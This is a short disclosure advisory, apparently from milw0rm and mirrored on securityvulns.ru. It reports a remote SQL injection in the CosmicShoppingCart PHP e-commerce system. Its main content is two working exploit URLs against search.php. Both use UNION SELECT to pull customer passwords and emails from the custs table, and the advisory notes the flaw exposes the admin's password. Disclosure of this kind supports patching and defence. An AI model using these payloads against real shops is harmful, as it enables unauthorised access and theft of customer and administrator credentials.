Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] [ GLSA 200605-16 ] CherryPy: Directory traversal vulnerability

  [Full-disclosure] Multiple XSS Vulnerabilities in Tikiwiki 1.9.x

  WikiNi Persistent Cross Site Scripting Vulnerability

  Multiple Xss exploits in Chipmunk Board

From:MILW0RM <submit_(at)_milw0rm.com>
Date:30.05.2006
Subject:CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability

Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.

SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,
1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a',
'a','a',cust_email,cust_password,'abc',1,'a',
'a'%20FROM%20custs--

# milw0rm.com [2006-05-28]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server